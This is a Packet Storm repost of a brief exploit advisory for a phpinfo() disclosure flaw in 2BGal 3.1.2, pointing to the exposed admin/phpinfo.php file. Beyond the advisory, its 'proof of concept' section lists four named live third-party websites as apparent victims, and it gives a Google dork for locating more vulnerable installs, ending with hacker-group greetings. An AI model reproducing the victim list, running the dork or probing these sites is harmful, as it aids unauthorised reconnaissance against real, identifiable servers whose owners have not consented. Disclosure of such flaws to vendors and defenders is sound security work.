2BGal version 3.1.2 appears to suffer from phpinfo() disclosure vulnerabilities.
35328103fee38fc7f424da18363a22f8
==========================================================================================
[o] 2BGal 3.1.2 phpinfo() Disclosure Vulnerability
Software : 2BGal version 3.1.2
Vendor : http://www.ben3w.com/
Download : http://www.ben3w.com/multimedia/devphp_2bgal.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
==========================================================================================
[o] Vulnerable file
admin/phpinfo.php
[o] Exploit
http://localhost/[path]/admin/phpinfo.php
[o] Proof of concept
http://www.montefiore.ulg.ac.be/ieee/2bgal/admin/phpinfo.php
http://www.tavakathamritam.net/gallery/admin/phpinfo.php
http://www.bfloortheatre.com/photo/admin/phpinfo.php
http://sunnysidealpacaranch.ca/album/admin/phpinfo.php
[o] Dork
"powered by 2bgal"
==========================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/news ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
==========================================================================================
© 2012 Packet Storm. All rights reserved.
%20Disclosure%u2248%20Packet%20Storm&utmhn=packetstormsecurity.org&utmr=-&utmp=%2Ffiles%2F78676%2F2BGal-3.1.2-phpinfo-Disclosure.html&utmac=UA-18885198-1&utmcc=__utma%3D32867617.1761980412.1338138143.1338138143.1338138143.1%3B%2B__utmz%3D32867617.1338138143.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!